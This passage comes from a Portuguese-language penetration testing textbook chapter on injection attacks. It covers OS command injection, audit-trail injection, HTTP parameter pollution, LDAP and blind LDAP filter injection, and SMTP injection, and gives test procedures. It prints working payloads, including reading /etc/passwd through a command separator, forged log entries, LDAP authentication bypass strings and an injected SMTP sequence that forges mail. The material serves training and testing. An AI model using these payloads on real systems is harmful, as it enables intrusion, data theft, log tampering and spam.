privilegiada, a plataforma pode ser comprometida; e, se a segmentao e controle de acesso
da rede so inadequados, outros ativos podem ser atacados, por meio da injeo. Como
possvel observar, portanto, fraquezas acessrias como essas so to crticas como as que
permitem o ataque de injeo, e, assim, devem ser identificadas em um teste de invaso.
315
Embora os tipos de ataques de injeo mais comuns sejam, de fato, o XSS e a injeo de SQL,
existem diversas outras variantes, igualmente perigosas e focadas em outras tecnologias,
que, muitas vezes, so ignoradas em um teste de invaso. Em situaes assim, obtm-se um
resultado incompleto e, por consequncia, a aplicao pode tornar-se alvo de ataques, se
ela contiver tais fraquezas. O propsito do presente captulo, ento, apresentar a grande
gama de ataques de injeo conhecidos, bem como as diversas tcnicas que podem ser uti-
lizadas para encontrar as vulnerabilidades associadas a eles. Desse modo, so consideradas
as injees: de comandos de sistema operacional, em trilhas de auditoria, em filtros LDAP,
em filtros LDAP s cegas, de comandos SMTP, de cabealhos de e-mail, de XPath, de XPath s SMTP
cegas, alm da poluio de parmetros HTTP e incluso de arquivos. Simple Mail Transfer
Protocol Protocolo
utilizado para a
transmisso de correio
Ataques de injeo eletrnico na internet,
definido pela RFC 821.
Por que ataques de injeo ocorrem?
Voc conhece outros ataques de injeo, alm do SQL e XSS?
Injeo de comandos de sistema operacional

Muitas vezes, uma aplicao necessita de servios fornecidos pelo sistema operacional q
e, embora os arcabouos modernos de desenvolvimento possuam APIs especficas para
acesso seguro a tais servios, no so raros os casos em que funes genricas de inte-
rao com o sistema so utilizadas (Stuttard e Pinto, 2007). Isso acontece porque mais
fcil memorizar uma nica funo, como shell_exec() em PHP, por exemplo, a qual pode
ser usada para executar qualquer programa do ambiente, do que diversas outras que s
podem ser empregadas para fins especficos.
Para ilustrar esta situao, considere-se uma aplicao em PHP que tem por objetivo exibir
o endereo IP de um nome de domnio fornecido pelo usurio. O mtodo correto e seguro
de implementar esta funcionalidade consiste no uso da funo gethostbyname(), conforme
exemplo abaixo, que no permite fazer nada alm da traduo de endereos:
$nome_de_dominio=$_POST[dominio];
$endereco_ip = gethostbyname($nome_de_dominio);
Para isso, o programador teria de conhecer a API ou pesquisar sobre a existncia dela na docu-
mentao do PHP. Infelizmente, a soluo que tende a ser adotada, e que permite o ataque de
injeo de comandos de sistema operacional, emprega uma construo similar seguinte:
$nome_de_dominio=$_POST[dominio];
$endereco_ip = shell_exec(nslookup .$nome_de_dominio);
316
Quando um parmetro, presente na requisio, concatenado diretamente ao nome do q
comando que deve ser executado pelo sistema operacional, um usurio malicioso pode
aproveitar-se da situao, para injetar comandos adicionais.
Note-se que, no cdigo acima, o parmetro dominio, presente na requisio, concate-

nado diretamente ao nome do comando que deve ser executado pelo sistema operacional.
Caso um valor legtimo, como www.esr.rnp.br, seja fornecido pelo usurio, a aplicao segue
seu curso normal e exibe o resultado, conforme ilustrado na Figura 7.1.
Figura 7.1 Um usurio malicioso, por outro lado, pode aproveitar-se de que capaz de controlar o valor
Resultado da submetido aplicao e fornecer a entrada a seguir:
traduo de nome
de domnio para
endereo IP. www.esr.rnp.br; cat /etc/passwd
Isso faz com que o texto abaixo seja passado ao sistema operacional, para processamento, o
que resulta na execuo do nslookup e do cat, conforme pode ser observado na Figura 7.2.
nslookup www.esr.rnp.br; cat /etc/passwd
Figura 7.2 importante observar que o sucesso do ataque acima depende do uso do caractere
Resultado da especial ;, o qual, em ambientes Linux, permite empilhar diversos comandos. Consequen-
injeo de comando
de sistema temente, caso a aplicao filtre este caractere, outra estratgia deve ser empregada, e,
operacional. assim, fundamental conhecer mtodos alternativos para submeter mltiplos comandos
simultneos ao sistema operacional. A Figura 7.3 ilustra tcnicas que podem ser utilizadas,
quando o servidor baseado em Windows ou Linux.
317
Caractere(s) Significado Windows Linux
Separa mltiplos comandos em uma mesma

cmd1; cmd2
linha. X
Direciona a sada do primeiro comando

cmd1 | cmd2
(cmd1) para o segundo (cmd2).
X X
Executa cmd1 e, depois, cmd2. Embora em

Linux, seja usado aps um comando, para
cmd1 & cmd2 execut-lo em segundo plano, tambm X X
atende ao propsito de submeter outro Figura 7.3
comando.
Caractere(s)
especial(is) que
Executa cmd2, aps cmd1, somente se este
cmd1 && cmd2
retornar sem erro.
X X permite(m) sub-
meter mltiplos
Executa cmd2, aps cmd1, somente quando comandos ao
cmd1 || cmd2
este retornar com erro.
X X sistema operacional
simultaneamente.
Outro aspecto que deve ser notado, em relao ao ltimo exemplo, que a sada do comando
injetado exibida na tela, junto com o resultado do comando original. Este, porm, nem
sempre o cenrio encontrado na prtica, e, nesses casos, a sada deve ser direcionada para
um arquivo em alguma pasta que possa ser acessada remotamente. Um forte candidato, neste
sentido, a prpria rvore de diretrios da aplicao web, e o caractere especial que possibilita
enviar o resultado da execuo de um comando para um arquivo o >. Para exemplificar,
considere-se que o diretrio raiz da aplicao se encontra em /var/www/html/site. O ataque
pode ser efetuado, empregando-se o seguinte valor de entrada:
www.esr.rnp.br; cat /etc/passwd > /var/www/html/site/passwd
Em seguida, basta acessar o arquivo gerado, utilizando um navegador web, conforme ilus-
trado na Figura 7.4.
Elaborando um pouco mais o cenrio, considere-se que o resultado do comando injetado Figura 7.4
no exibido e nem se sabe o diretrio em que a aplicao est instalada. Neste caso, um Acesso ao arquivo
passwd gerado por
modo de testar se ela vulnervel ao ataque consiste em se aplicar uma das tcnicas um ataque de inje-
empregadas em ataques de injeo de SQL s cegas, que se baseia na tentativa de intro- o de comandos.
duo de uma pausa na execuo do sistema (Stuttard e Pinto, 2007). Isto pode ser obtido,
por exemplo, por meio do comando ping, empregado da seguinte maneira:
318
argumento & ping -c 30 localhost
O qual causar um atraso somente se a aplicao apresentar a vulnerabilidade. Com base

nesse mtodo, possvel traar o seguinte roteiro geral de testes:
1. Para cada item de entrada identificado na fase de mapeamento, que aparente ser
passado como argumento para um comando do sistema operacional:
1.1.Fornea o valor abaixo:
valor & ping c 30 <nome de domnio vlido>
1.2.Se uma pausa de cerca de 30 segundos ocorrer, a aplicao vulnervel.
1.3.Caso no ocorra, repita o Passo 1.1, utilizando outros caracteres para submisso de
mltiplos comandos.
Injeo em trilhas de auditoria

Trilhas de auditoria so constitudas de registros que descrevem as atividades realizadas q
em um ambiente, independente de sucesso ou falha.
Um mecanismo desse tipo deve registrar diversos eventos, tais como: operaes administra-
tivas, tentativas de conexo ao sistema, encerramento de sesses, ativao ou desativao do
prprio mdulo de auditoria e operaes crticas, dentre outros. A lista completa de eventos
a ser contemplada, normalmente, resulta de uma anlise de riscos do ambiente, de normas
e padres de segurana da informao e de leis. Ademais, para que o mecanismo seja eficaz,
cada registro deve indicar, em relao ao evento, pelo menos data e hora de ocorrncia, a
identidade do usurio envolvido, a ao realizada, se a operao foi bem-sucedida ou no e o
endereo de rede originrio do evento.
Os principais propsitos para o uso deste mecanismo de segurana, segundo Grzelak q

(2007), podem ser sumarizados em trs categorias:
1 Depurao de programas usado no incio do ciclo de desenvolvimento do software,

para auxiliar na deteco de erros de lgica e consequente melhoria do produto.
Muitas vezes, esta funcionalidade acaba sendo transportada para o ambiente de
produo, embora isto seja uma m prtica de segurana.
1 Deteco de comportamento anmalo ou malicioso uma vez implantada a

aplicao, em ambiente de produo, a partir dos eventos registrados, possvel
detectar comportamento inesperado do sistema ou atividade maliciosa de usurios,
que viola a poltica de segurana vigente.
1 Evidncia em processos forenses trilhas de auditoria so fundamentais, do ponto de

vista legal, para imputar a indivduos especficos responsabilidade sobre aes realizadas.
Ataques de injeo em trilhas de auditoria, tratados nesta seo, permitem inserir regis-
tros fraudulentos de eventos, quando elas so armazenadas especificamente em arquivos

de texto puro. Note-se que o resultado da explorao viola a integridade do arquivo como
um todo, afetando diretamente os dois ltimos objetivos acima mencionados.
No caso do primeiro, o principal requisito de segurana da informao a ser atendido o

sigilo das trilhas, o que torna o ataque pouco apropriado para aquele escopo. Para isso,
outras tcnicas devem ser usadas, visando o comprometimento da plataforma ou a injeo
de comandos de sistema operacional.
319
Para entender a vulnerabilidade e como ela pode ser explorada, considere-se uma aplicao
que registra em um arquivo de trilha de auditoria as tentativas vlidas e invlidas de autenti-
cao, conforme ilustrado na Figura 7.5.
[root@seg9 logi]# cat logfile
[07/04/2012 - 10:14:22] Conta esr se conectou com sucesso.

Figura 7.5
[07/04/2012 - 10:14:27] Tentativa de conexo com a conta es. Exemplo de arquivo
de trilha de
[07/04/2012 - 10:14:35] Tentativa de conexo com a conta adm. auditoria.
Sejam os seguintes trechos de cdigo os responsveis pela populao do arquivo:
$userid=$_POST[userid];
...
fwrite($res, $date.Conta .$userid. se conectou com sucesso.\n);
...
fwrite($res, $date.Tentativa de conexo com a conta

.$userid..\n);
Observe-se que o valor da varivel $userid obtido a partir de um parmetro da requi-

sio e diretamente concatenado mensagem a ser gravada, sem nenhum tratamento. Se
um usurio malicioso desejar inserir um registro fraudulento no arquivo de trilhas, ele deve
fornecer um caractere de final de linha, como parte do parmetro, seguido do texto que
quer injetar:
esr.%0a[07/04/2012 - 10:14:40] Conta admin se conectou com sucesso
Isso faz com que o segundo fwrite() seja usado e o texto malicioso, inserido no final da
mensagem. A sequncia %0a corresponde codificao URL do caractere de final de
linha, o qual, quando gravado, finaliza o registro atual e inicia o prximo, cujo contedo, no
exemplo, consiste no restante do identificador de usurio digitado pelo atacante. O resul-
tado final pode ser observado na Figura 7.6, que destaca em negrito o texto injetado.
[07/04/2012 - 10:14:22] Conta esr se conectou com sucesso.
[07/04/2012 - 10:14:27] Tentativa de conexo com a conta es.
[07/04/2012 - 10:14:35] Tentativa de conexo com a conta adm.

Figura 7.6
[07/04/2012 - 10:14:21] Tentativa de conexo com a conta esr. Resultado da

injeo de um
[07/04/2012 - 10:14:22] Conta admin se conectou com sucesso. registro de trilha
de auditoria.
Um ponto importante que deve ser ressaltado, para o sucesso do ataque, que o caractere de
final de linha deve ser inserido, codificado, por meio de um proxy de interceptao, porque, a
partir da tela da aplicao, s possvel fornecer caracteres imprimveis. A digitao do valor
%0a ou \n entendida pelo navegador web como uma sequncia de mltiplos caracteres,
dos quais % e \ passam por codificao URL, antes de serem enviados.
320
Algumas implementaes de sistemas de trilhas de auditoria tentam evitar a adulterao
e insero de registros, adicionando um campo que contm o hash criptogrfico de cada
entrada do arquivo. Esta soluo completamente insegura, pois a gerao de hash no
depende de nenhuma informao sigilosa, e, logo, pode ser reproduzida pelo atacante e
injetada junto com a entrada maliciosa. Dada esta justificativa, fica fcil perceber que uma
abordagem correta deve, em vez de funes de hash criptogrfica, empregar algoritmos de
assinatura digital ou cdigos de autenticao de mensagens.
Verificar se uma aplicao vulnervel injeo em trilhas de auditoria uma tarefa difcil,
quando o teste realizado do tipo caixa-preta. Isso acontece porque nesses casos no
possvel ver o formato dos registros de auditoria e nem o resultado da injeo, salvo se, por
problemas na configurao das plataformas subjacentes, for possvel acessar o arquivo no qual
os eventos so gravados. Desse modo, recomenda-se que, para esta fraqueza, os testes sejam
suportados por informaes adicionais, como formato do arquivo e cdigo-fonte, por exemplo.
Poluio de parmetros HTTP

O ataque de poluio de parmetros HTTP (HPP) foi introduzido em 2009 por Luca Carettoni
e Stefano di Paola, no OWASP EU09, realizado na Polnia.
Basicamente, afeta aplicaes que usam valores de parmetros HTTP, para construir, q
dinamicamente, links para recursos, sem verificar se aqueles pertencem ao domnio
esperado. Embora pouca ateno seja dada a esta tcnica, ela bastante poderosa e
pode afetar o cdigo da aplicao tanto no lado do cliente como do servidor.
Alguns cenrios de uso possveis incluem a quebra de tokens anti-CSRF, contorno de

firewalls de aplicao e alterao de parmetros de requisio, supostamente, fora do
controle do usurio.
Antes de prosseguir com a explicao do problema em si, importante discutir o que

ocorre em aplicaes web, quando so submetidas mltiplas instncias de um mesmo
parmetro HTTP. Note-se que tal situao comum em formulrios que utilizam um
conjunto de check-boxes, que compartilham o mesmo nome.
Nestes casos, como a repetio esperada, os desenvolvedores normalmente utilizam

as funes adequadas para tratamento de mltiplos valores. Porm, quando o compor-
tamento normal que o parmetro aparea uma nica vez, a tendncia que sejam
usadas funes que assumam esta premissa como verdadeira.
Quando isso acontece, o valor que devolvido aplicao depende da tecnologia web
adotada, conforme se observa na Figura 7.7, extrada de (Balduzzi, 2011).
Tecnologia/Servidor Mtodo/Funo Precedncia
Todas as ocorrncias,
ASP/IIS Request.QueryString(par)
delimitadas por vrgula.
PHP/Apache $_GET[par] ltima ocorrncia.
Figura 7.7 JSP/Tomcat Request.getParameter(par) Primeira ocorrncia.

Precedncia
adotada na presena Perl (CGI)/Apache Param(par) Primeira ocorrncia.
de mltiplos
parmetros com o Todas as ocorrncias, em
Python/Apache getValue(par)
mesmo nome. uma lista.
321
Uma pequena variao do cenrio acima, mas que possui o mesmo efeito, consiste na
submisso de parmetros com mesmo nome no corpo da requisio e na URL simultane-
amente. O valor que considerado depende, novamente, das tecnologias que so empre-
gadas pela aplicao. Por exemplo, quando JSP usado em conjunto com Tomcat, o valor
da URL devolvido, e, para PHP com Apache, retorna-se o argumento contido no corpo da
requisio. Note-se que, de modo a evitar problemas, uma boa prtica que deve ser seguida,
neste contexto, sempre buscar o valor no canal especfico esperado (Balduzzi, 2011).
Agora que os fundamentos necessrios foram cobertos, considere-se uma aplicao

escrita em PHP, que permite que o usurio participe de uma enquete, depois de fornecido
o nmero dela (vide Figura 7.8). Quando isso ocorre, a seguinte requisio realizada pelo
navegador web:
http://hpp.esr.rnp.br:80/build_poll.php?numero=123456&Submit1=Prosseguir
E uma ficha para votao exibida ao usurio, contendo um link para cada uma das opes
possveis, como se observa na Figura 7.9.
Figura 7.8
Aplicao para par-
ticipar de enquete.
Figura 7.9
Ficha de votao.
O cdigo que constri a ficha de votao obtm o nmero da enquete a partir do parmetro
numero e o utiliza na construo dinmica de cada link, sem validao do valor fornecido:
$numero=$_REQUEST[numero];
...
echo(<a href=http://hpp.esr.rnp.br/post_vote.php?id=1&poll_id=.
$numero.>XSS</a><br>);
...
Quando um nmero legtimo fornecido, um elemento semelhante ao abaixo inserido na

pgina HTML:
<a href=http://hpp.esr.rnp.br/post_vote.php?id=1&poll_id=123456>XSS
</a><br>
322
O que acontece, porm, se o usurio induzido a acessar um link para a URL abaixo?
http://hpp.esr.rnp.br/build_poll.php?numero=123456%26id%3d3
Observe-se que o valor do parmetro numero usa codificao URL e corresponde ao

texto numero=123456&id=3. Quando a aplicao o utiliza para gerar os links da cdula de
votao, os seguintes elementos so criados:
<a href=http://hpp.esr.rnp.br/post_vote.php?id=1&poll_id=123456&id=3>
XSS</a><br>
Injeção de SQL</a><br>
CSRF</a>
Neste cenrio, o script post_vote.php, ao extrair o parmetro id, por meio da construo
$_GET[id], devido s regras de precedncia de PHP, obter sempre o valor 3.
Em decorrncia disso, independente da opo escolhida, o voto sempre ser depositado
para o ataque CSRF, correspondente ao identificador injetado.
Valendo-se das regras de precedncia, um desenvolvedor ingnuo pode tentar mitigar o

problema, colocando o parmetro id ao final da query string, por meio da seguinte alte-
rao no cdigo:
echo(<a href=http://hpp.esr.rnp.br/post_vote.php?poll_id=.
$numero.&id=1>XSS</a><br>);
Com esta melhoria, de fato, o ataque executado anteriormente deixa de funcionar. Entre-
tanto, um usurio malicioso pode empregar o caractere #, para impedir que o parmetro
inserido no final da query string seja enviado durante a requisio. Para isso, a URL do link
que a vtima precisa clicar deve ser alterada para o seguinte valor:
http://hpp.esr.rnp.br/build_poll2.php?numero=123456%26id%3d3%23
Ao gerar a cdula com o novo cdigo e o parmetro ajustado, os elementos a seguir so criados:
<a href=http://hpp.esr.rnp.br/post_vote.php?poll_id=123456&id=3#&id=1>
XSS</a><br>
Injeção de SQL</a><br>
CSRF</a>
Desse modo, ao selecionar uma opo, somente o parmetro fixado pela poluio enviado
ao servidor, para processamento, em detrimento do valor original. Consequentemente, o
resultado da enquete pode ser manipulado, caso a maioria dos participantes acesse a apli-
cao, por meio de uma pgina maliciosa, que efetue o ataque.
323
Para verificar se uma aplicao vulnervel poluio de parmetros HTTP, os seguintes
passos podem ser executados:
1. Determine a precedncia de parmetros HTTP utilizados pelas tecnologias web empregadas.
1.1.Escolha um parmetro de requisio identificado na fase de mapeamento, que

exibido na resposta da aplicao.
1.2.Submeta uma requisio com o parmetro duplicado, mas com um valor diferente.
1.3.Veja qual dos dois valores exibido, para determinar a precedncia.
2. Verifique se parmetros definidos no corpo da requisio ou em cookies possuem prece-

dncia menor que os de URLs.
2.1.Escolha um parmetro de requisio identificado na fase de mapeamento, que

aparece no corpo da mensagem e que exibido na resposta da aplicao.
2.2.Submeta uma requisio com o parmetro copiado na URL, mas com um valor diferente.
2.3.Veja qual dos dois valores exibido, para determinar a precedncia.
3. Teste os parmetros que so vulnerveis poluio:
3.1.Para cada parmetro identificado na fase de mapeamento, inclua ao final do valor

um parmetro inexistente, como &esr=rnp, por exemplo, mas de maneira codifi-
cada, isto , %26esr%3drnp.
3.2.Verifique se o parmetro injetado aparece em links ou em formulrios, sem con-

siderar o parmetro testado, que pode mudar de nome, no documento fornecido
como resposta. Em caso positivo, o parmetro alvo vulnervel poluio.
Injeo em filtros LDAP

Lightweight Directory Access Protocol (LDAP), como o prprio nome sugere, um proto- q
colo leve e eficiente usado para acessar diretrios de informaes, especificamente, os
baseados na srie de padres X.500. X.500
Conjunto de padres
Tais diretrios so organizados hierarquicamente em formato de rvore, de maneira a repre- desenvolvido pelo ITU-T,
sentar a estrutura organizacional de uma entidade, ou, alternativamente, a estrutura de nomes que define aspectos de
servios de diretrios
de domnio da internet, conforme ilustrado na Figura 7.10(a) e Figura 7.10(b), respectivamente.
q
eletrnicos.
Cada entrada de um diretrio referenciada de maneira nica, por meio do Distingui-

shed Name (DN), que composto pela concatenao dos nomes de todos os ns perten-
centes ao caminho entre ela prpria e a raiz (Zeilenga, 2006a).
Por exemplo, a entrada uid=Fulano, representada na Figura 143(b), possui como DN o valor
uid=Fulano, ou=People, dc=RNP, dc=BR.
324
raiz raiz
c = BR dc = BR
st = So Paulo dc = RNP
o = RNP ou = Group ou = People
ou = CAIS ou = ESR uid = Fulano
uid = Fulano
(a) (b)
Figura 7.10 Um elemento do diretrio corresponde a uma instncia de uma classe de objeto, a qual
Estruturas de descreve os atributos que o compem e quais deles obrigatoriamente devem sempre estar
diretrios: (a)
Modelo tradicional. presentes. Assim como o prprio diretrio, tambm possvel organiz-las de maneira
(b) Modelo baseado hierrquica, o que faz que todas as propriedades da classe-me sejam herdadas pela
em DNS. classe-filha. Agrupamentos de classes so definidos em esquemas, os quais devem ser
carregados pelo servidor LDAP, durante o processo de inicializao. Considerando o mesmo
exemplo usado acima, tem-se que o objeto em questo pertence classe account, cujo
nico atributo mandatrio o userid, tambm chamado de uid. Dentre os atributos
opcionais esto organizationalUnitName, host e description.
Observe-se que acessar um determinado objeto na rvore, por meio do DN, trivial, uma
vez que basta percorr-lo do final para o comeo, para se chegar ao n desejado.
Muitas vezes, porm, necessrio procurar um ou mais elementos no diretrio, que q

atendam a um conjunto de critrios dependentes da aplicao. Por exemplo, em um
sistema de gesto de identidades, pode-se desejar encontrar todos os colaboradores
que desempenham determinada funo na empresa ou que possuem privilgios admi-
nistrativos sobre um sistema. Nesses casos, devem ser empregados filtros de busca, cuja
representao textual segue a gramtica descrita na RFC 4515 (Smith e Howes, 2006), a
qual est reproduzida no apndice deste captulo.
O ataque surge quando a aplicao contri, dinamicamente, tais filtros, com base em
valores no validados, fornecidos por usurios.
Para compreender melhor o ataque desta seo, fundamental que o leitor esteja familiari-
zado com a sintaxe de tais filtros, pois neles que ocorre a injeo. Como ponto de partida,
observe-se que todo filtro delimitado por parnteses e que os operadores seguem uma
notao prefixada. Com isso em mente, possvel construir a seguinte consulta bsica, para
se encontrar todos os elementos cujo atributo uid seja igual a esruser:
(uid=esruser)
325
Note-se que a busca feita em toda a rvore, uma vez que um n base no foi definido,
como elemento inicial.
Alterando um pouco o filtro para uso em um sistema de autenticao de usurios, chega-se

ao seguinte filtro, que visa encontrar objetos com uid e senha especficos:
(&(uid=esruser)(senha=pwd))
Considere-se agora uma aplicao que permite localizar todos os funcionrios que moram
em uma de vrias cidades especificadas pelo usurio. Neste cenrio, supondo que o con-
junto escolhido fosse composto por Campinas, Braslia e Vinhedo, um possvel filtro seria:
(|(cidade=Campinas)(cidade=Braslia)(cidade=Vinhedo))
Um ponto importante que deve ser observado neste ltimo exemplo que o operador |
(OR) permite mais que dois operandos, da mesma maneira que o & (AND).
Outras construes que podem ser teis no contexto desta seo esto abaixo listadas:
1 (atributo=*) seleciona elemento se o atributo estiver presente.

1 (!(atributo=valor)) seleciona n se o atributo for diferente do valor especificado.
1 (objectClass=*) seleciona todo e qualquer objeto, pois indica que ele pode pertencer a
qualquer classe existente.
1 (&) verdadeiro absoluto.

1 (|) falso absoluto.
De tudo que j foi abordado at aqui, fica fcil concluir que um ataque de injeo em filtros
LDAP (Alonso et al., 2008; Guillardoy et al., 2010a; Faust, 2003) ocorre quando eles so cons-
trudos, dinamicamente, a partir de valores fornecidos pelo usurio, que no passaram por
uma devida validao. Com o objetivo de entender o mtodo de explorao e as dificuldades
existentes em alguns casos, considere-se a aplicao escrita em PHP e ilustrada na Figura 7.11,
que exibe diversas informaes do usurio, desde que sejam fornecidas credenciais vlidas.
Figura 7.11
Aplicao vulne-
rvel injeo em
filtro LDAP.
O filtro de busca construdo por meio dos seguintes comandos, que concatenam os valores
dos parmetros uid e pwd, fornecidos na requisio POST:
$uid=$_POST[uid];
$pwd=$_POST[pwd];
...
$filter = (&(uid=.$uid.)(userPassword=.$pwd.));
326
Relembrando o ataque de injeo de SQL, em cenrio similar, a estratgia consistiria na
insero de uma tautologia, como id or 1=1--. Note-se, porm, que no possvel aplicar
a mesma ideia, no exemplo acima, primeiro, porque o operador prefixado e no pode ser
substitudo, e, segundo, porque no h como comentar o restante da linha, de modo a evitar
a criao de um filtro sintaticamente incorreto. Desse modo, injees em filtros baseados
em operador & s funcionam se o servidor considerar apenas a parte inicial e correta do
filtro submetido, como acontecia, antigamente, com o OpenLDAP (Alonso et al., 2008). Neste
caso, um usurio malicioso poderia fornecer um texto qualquer para pwd, e o seguinte
valor para uid:
root)(&)
Que resultaria no seguinte filtro:
(&(uid=root)(&))(userPassword=senha))
\_ _ _ _ _ _ _ _ _ _ _ _ _ _/\_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _/
Filtro vlido Parte descartada
O qual permitiria que as informaes do usurio root fossem visualizadas, mesmo que no
se conhea a senha da conta (vide Figura 7.10).
Figura 7.12 Uma situao mais plausvel de ser explorada, que no depende de vulnerabilidades no
Resultado de servidor, ocorre quando a aplicao utiliza filtros baseados no operador |. Como exemplo,
injeo em filtro
LDAP baseado em considere-se uma aplicao escrita em PHP, que permite listar dispositivos pertencentes a
operador &. classes escolhidas pelo usurio (vide Figura 7.12) e que constri o filtro com o cdigo abaixo:
$filter = (|(l=xpto);
if ($ _ REQUEST[imp]) {
$filter = $filter.(l=.$ _ REQUEST[imp].);
if ($ _ REQUEST[sca]) {
$filter = $filter.(l=.$ _ REQUEST[sca].);
if ($ _ REQUEST[plo]) {
$filter = $filter.(l=.$ _ REQUEST[plo].);
$filter = $filter.);
327
Figura 7.13
Aplicao vulne-
rvel injeo em
filtro LDAP.
Para explorar esta aplicao, possvel, por exemplo, interceptar a requisio e alterar o
valor de imp de impressora para a forma codificada de:
impressora)(objectClass=*
Resultando no seguinte filtro e, consequentemente, na listagem de todos os objetos do dire-

trio, conforme ilustrado na Figura 7.13:
(|(l=xpto)(l=impressora)(objectClass=*))
O teste para verificar se uma aplicao vulnervel injeo em filtros LDAP consiste nos Figura 7.14
passos descritos a seguir: Resultado de
injeo em filtro
LDAP baseado em
1. Para cada item de entrada identificado na fase de mapeamento: operador |.
1.1.Fornea um nmero crescente de caracteres (, com o objetivo de causar um erro

sinttico no filtro LDAP, que seja exibido ou informado pela aplicao.
1.2.Se o passo anterior no for bem-sucedido, execute-o novamente usando o carac-

tere ) no lugar de (, e veja se o resultado da consulta sofre alguma alterao.
1.3.Caso qualquer dos passos anteriores seja efetuado com sucesso, infira se o valor
est sendo usado em um filtro baseado em operador | ou &.
1.4.Para o operador |, fornea um valor como valor)(& e veja se a quantidade de

resultados aumenta.
1.5.Para o operador &, submeta um valor como valor)(| e veja se a resposta usual
deixa de ser exibida.
Injeo em filtros LDAP s cegas

328
Ataques de injeo em filtros LDAP s cegas utilizam a mesma estratgia que a contra- q
parte baseada em SQL, que consiste na submisso de perguntas booleanas aplicao,
para extrao de um bit de informao por vez. Para que eles funcionem corretamente,
necessrio ser capaz de discernir se uma expresso injetada avaliada como ver-
dadeira ou falsa, o que se pode conseguir por meio da identificao de diferenas nas
respostas do servidor.
Por exemplo, considerando um filtro baseado em &, se a tela exibida em funo de uma
requisio como a ilustrada na Figura 7.14, sabe-se que todos os operandos so verdadeiros,
para o objeto selecionado. Por outro lado, se o resultado obtido o representado na Figura 7.15,
conclui-se que nenhum objeto presente no diretrio satisfaz todas as subexpresses do filtro.
Figura 7.15 Supondo que a resposta positiva resulte da submisso do id root e da senha correspon-
Resultado quando o dente, a injeo de uma pergunta possvel, alterando-se o valor do identificador da
filtro no encontra
objetos. seguinte maneira:
root)(pergunta booleana
Por exemplo, para verificar se o objeto pertence classe user, o valor submetido deve ser:
root)(objectClass=user
Resultando no filtro:
(&(uid=root)(objectClass=user)(userPassword=senha))
Neste caso, as informaes da conta somente continuaro a ser exibidas, se a expresso

(objectClass=user) for verdadeira.
Adotando o mesmo raciocnio, para verificar se o objeto possui determinado atributo,

pode-se utilizar a entrada:
root)(attr=*
Se ele existir, o prximo passo consiste em descobrir o valor definido para o objeto selecio-
nado, o que pode ser realizado por meio do caractere curinga *, desde que a propriedade
Substring Rule do atributo tenha sido configurada, para permitir comparao parcial.
A ideia consiste em percorrer, iniciando-se na primeira posio do valor que se quer des-
cobrir, todos os caracteres possveis, at se encontrar o correto. Em seguida, a primeira

posio fixada com o valor certo e o processo, repetido para a segunda posio. O mtodo
continua at que o valor inteiro seja recuperado.
Supondo que o atributo attr, no exemplo acima, somente aceite letras e tenha o valor
tela, as seguintes requisies devem ser enviadas aplicao:
329
Primeira posio
root)(attr=a*
root)(attr=b*
...
root)(attr=t*
Segunda posio
root)(attr=ta*
...
root)(attr=te*
Terceira posio
root)(attr=tea*
...
root)(attr=tel*
Quarta posio
root)(attr=tela*
Quinta posio
root)(attr=telaa*
...
root)(attr=telaz*
importante observar que no h como especificar, em um filtro LDAP, o comprimento q

de um atributo, e, assim, no cenrio abordado, o processo de descoberta deve ser reali-
zado at a quinta posio, para se concluir que o valor possui apenas quatro caracteres.
Claramente, o processo demorado e precisa ser automatizado, para se extrair o contedo

de um diretrio inteiro. Recorrendo, novamente, contraparte em SQL, pode-se pensar em
aplicar as tcnicas de busca binria ou bit-a-bit, de modo a melhorar a eficincia do ataque.
Entretanto, enquanto a ltima no possvel, a primeira depende das propriedades
Ordering e Substring Rule, de cada atributo.
Injeo de comandos SMTP e de cabealhos de e-mail

Muitas aplicaes web apresentam uma pgina que permite que usurios enviem q
comentrios, elogios, reclamaes e dvidas sobre os servios oferecidos pela enti-
dade, independente do ramo de atuao. Um meio de implementar essa funcionalidade
resume-se em enviar a mensagem, por meio de correio eletrnico, podendo a aplicao
estabelecer uma conversao SMTP diretamente com o servidor de e-mails, ou usar uma
funo que encapsule tal conhecimento.
330
Em um cenrio possvel, comandos SMTP injetados em um campo so inseridos em uma con- q
versao SMTP, o que permite que duas mensagens de correio eletrnico sejam enviadas.
Em qualquer dos casos, porm, vulnerabilidades implicam poder enviar mensagens arbitrrias,
Spam sem autenticar-se, e, por isso, so usadas para a disseminao de spam (Stuttard e Pinto, 2007).
Consiste no envio
de mensagens Antes de descrever os ataques, importante realizar uma breve reviso do protocolo SMTP,
no solicitadas de para se conhecer os comandos necessrios para o envio de mensagens. Uma interao
correio eletrnico,
tpica, realizada entre cliente e servidor, est ilustrada na Figura 7.16 e explicada a seguir.
com objetivos to
diversos como O comando HELO permite que o cliente se identifique para o servidor, informando o nome
realizar propaganda e de domnio que possui. Aps receber a resposta, o envelope definido pelos comandos
disseminar malware,
MAIL e RCPT, com os quais so especificados remetente e destinatrio, respectivamente.
por exemplo.
Os cabealhos e o corpo da mensagem so enviados, aps a execuo do comando DATA, e
um ponto (.) sozinho em uma linha usado para indicar o fim da mensagem. Finalmente, a
submisso ao destinatrio ocorre quando o cliente efetua um QUIT.
~$ telnet alt1.aspmx.l.exemplo.com 25
Trying 100.100.100.27...
Connected to alt1.aspmx.l.exemplo.com.
Escape character is ^].
220 mx.exemplo.com ESMTP fq5si3132623vcb.146
HELO e100.esr.rnp.br
250 mx.exemplo.com at your service
MAIL FROM:<esruser@esr.rnp.br>
250 2.1.0 OK fq5si3132623vcb.146
RCPT TO:<esruser@gmail.com>
250 2.1.5 OK fq5si3132623vcb.146
DATA
354 Go ahead fq5si3132623vcb.146
From:esruser@esr.rnp.br
Subject:Teste
Teste de SMTP
250 2.0.0 OK 1334581185 fq5si3132623vcb.146
QUIT
Figura 7.16
Conversao SMTP 221 2.0.0 closing connection fq5si3132623vcb.146
para envio de men-
sagem de correio Connection closed by foreign host.
eletrnico.
331
Para entender a primeira vulnerabilidade, considere-se uma aplicao que aceita do usurio
o endereo de correio eletrnico, o assunto e o corpo da mensagem, e que os insere
diretamente em uma conversao SMTP com o servidor de e-mails, como parte dos
comandos apropriados. O que aconteceria se um usurio malicioso finalizasse o texto com
uma quebra de linha e um ponto, fornecendo, em seguida, os comandos MAIL, RCPT e DATA,
conforme ilustrado na Figura 7.17?
Mensagem original.
MAIL FROM:<evil@evil.org>
RCPT TO:<outro.usuario@localhost>
DATA
From:evil@evil.org
To:outro.usuario@localhost
Subject:Mensagem falsa
Figura 7.17
Esta mensagem foi forjada! Texto original forne-
